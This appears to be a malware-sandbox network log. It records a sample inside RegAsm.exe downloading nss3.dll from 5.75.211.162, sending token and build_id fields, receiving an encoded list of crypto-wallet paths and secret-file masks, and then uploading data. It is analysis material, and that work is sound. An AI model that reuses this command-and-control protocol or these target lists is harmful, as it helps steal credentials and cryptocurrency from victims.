2024-09-26 22:14:52 UTC	193	OUT	GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:53 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:53 GMT Content-Type: application/octet-stream Content-Length: 2046288 Connection: close Last-Modified: Thursday, 26-Sep-2024 22:14:53 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 22:14:53 UTC	16121	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
2024-09-26 22:14:53 UTC	16384	IN	Data Raw: 1f 01 f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a Data Ascii: kd)i)ff f@U \|AAIQQAEq@AfAAi)\f fR \|9U\|&AVQ\|A@fAfAA1<MA
2024-09-26 22:14:53 UTC	16384	IN	Data Raw: 52 f4 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 Data Ascii: RQ=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`\|$\tD$euL$PhD$TD$E
2024-09-26 22:14:53 UTC	16384	IN	Data Raw: 40 a1 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 Data Ascii: @@;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
2024-09-26 22:14:53 UTC	16384	IN	Data Raw: ff 8b 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
2024-09-26 22:14:53 UTC	16384	IN	Data Raw: 18 89 d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
2024-09-26 22:14:53 UTC	16384	IN	Data Raw: 64 8b 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b Data Ascii: d8C0;^h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$
2024-09-26 22:14:53 UTC	16384	IN	Data Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
2024-09-26 22:14:53 UTC	16384	IN	Data Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff Data Ascii: Y`P19F$WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
2024-09-26 22:14:53 UTC	16384	IN	Data Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 Data Ascii: 4D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49757	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:55 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJEGHDAECBFHJKEGIJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:55 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 48 44 41 45 43 42 46 48 4a 4b 45 47 49 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------JJJEGHDAECBFHJKEGIJKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JJJEGHDAECBFHJKEGIJKCont
2024-09-26 22:14:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:56 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49758	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:56 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHIEBAAKJDHIECAAFHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:56 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 49 44 48 49 45 42 41 41 4b 4a 44 48 49 45 43 41 41 46 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------IDHIEBAAKJDHIECAAFHCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------IDHIEBAAKJDHIECAAFHCCont
2024-09-26 22:14:57 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:57 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49759	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:58 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBKJDBAAKJDGCBFHCFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:58 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 42 4b 4a 44 42 41 41 4b 4a 44 47 43 42 46 48 43 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------KEBKJDBAAKJDGCBFHCFCContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------KEBKJDBAAKJDGCBFHCFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------KEBKJDBAAKJDGCBFHCFCCont
2024-09-26 22:14:59 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:14:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:14:59 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49760	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:14:59 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIDAKECFIEBGDHJEBKK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:14:59 UTC	461	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 44 41 4b 45 43 46 49 45 42 47 44 48 4a 45 42 4b 4b 0d 0a 43 6f 6e 74 Data Ascii: ------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------EHIDAKECFIEBGDHJEBKKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EHIDAKECFIEBGDHJEBKKCont
2024-09-26 22:15:00 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 22:15:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 22:15:00 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49762	5.75.211.162	443	396	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 22:15:01 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCFBAEGDHIEBFHDGCB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 98737 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 22:15:01 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 46 42 41 45 47 44 48 49 45 42 46 48 44 47 43 42 0d 0a 43 6f 6e 74 Data Ascii: ------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------BAFCFBAEGDHIEBFHDGCBContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------BAFCFBAEGDHIEBFHDGCBCont
